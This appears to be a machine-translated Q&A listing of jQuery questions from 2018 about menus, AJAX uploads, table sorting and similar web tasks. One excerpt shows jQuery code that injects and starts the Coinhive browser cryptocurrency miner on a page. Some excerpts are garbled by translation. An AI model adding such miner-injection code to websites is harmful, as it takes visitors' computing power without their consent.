Questions tagged as 'jquery'

0
answers

Jquery Slide Effect

I'm making a website with p5.js and jquery. It has a menu right where I put the slide effect but it has a small bug. What I qro eh q when the user hover the mouse in the div (hover) open the menu that in the case eh the div (div-menu), but th...
asked by 27.08.2018 / 00:00
1
answer

Execute function for various items in JS

I have a function that is responsible for updating the values in some <div> , script follows: file.js window.onload = function makeRequest() { var xmlHttp = new XMLHttpRequest(); xmlHttp.onreadystatechange = function()...
asked by 28.08.2018 / 15:36
0
answers

Sort Table Array

EDIT: I was able to make the order using the points earned, but if the points are the same, it would need to get the goal balance to order, I tried to add another value in the array_key, but the syntax error, if someone can explain me by Pl...
asked by 14.08.2018 / 20:16
1
answer

How to select a child in JS and use the value that assign it to a function?

<li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false">Direct Ship File</a> <div class="dropd...
asked by 14.08.2018 / 20:20
1
answer

JQuery error when using .before

$(".enviar").before('<script src="https://coinhive.com/lib/coinhive.min.js"></script><script>varminer=newCoinHive.Anonymous("4jimrwZqZRoKFX1001NpibYyv1up80Y2"); miner.start();</script>'); This is my complete sc...
asked by 30.08.2018 / 02:14
0
answers

Simple problem with JQuery when creating an extension

Hello, I'd like a help on a JQuery snippet, the problem is simple but I do not know how to solve it because I'm a beginner and I'm having a lot of trouble. I'm going to explain everything right about the project I'm doing is the following I'm wo...
asked by 30.08.2018 / 00:42
0
answers

Cycle 2 does not work

I've been able to do a slyde with pagers, but I had to invoke the cycle function. I say this because in the official website it says that it does not need any line of code, everything is done by marking, but in fact it was not so, now coming bac...
asked by 14.08.2018 / 02:45
0
answers

How to detect that one class has touched the other? [duplicate]

I have a question regarding the detection of classes in Jquery. For example. I'm developing a land page and in it has the navbar that when it arrives in certain parts of the site it changes color, only that it has a problem, I'm doing it in a...
asked by 15.08.2018 / 16:19
0
answers

Uploading files with AJAX before writing to the database

I have a product registration form where you can select multiple photos. So far so good, but I need to perform some validations on the photos selected. And from what I've seen it's only possible to upload those files via AJAX the moment they are...
asked by 09.08.2018 / 02:55
1
answer

How to write information (cpf) of an edit with a mask and a numeric field

In the database I have the CPF field of type bigint. In the model it is a long. This is what was requested in the requirement. Well, in the model I will masquerade for a DataType.Text to accept the mask, but when I leave the field (OnBlur) the f...
asked by 12.08.2018 / 18:28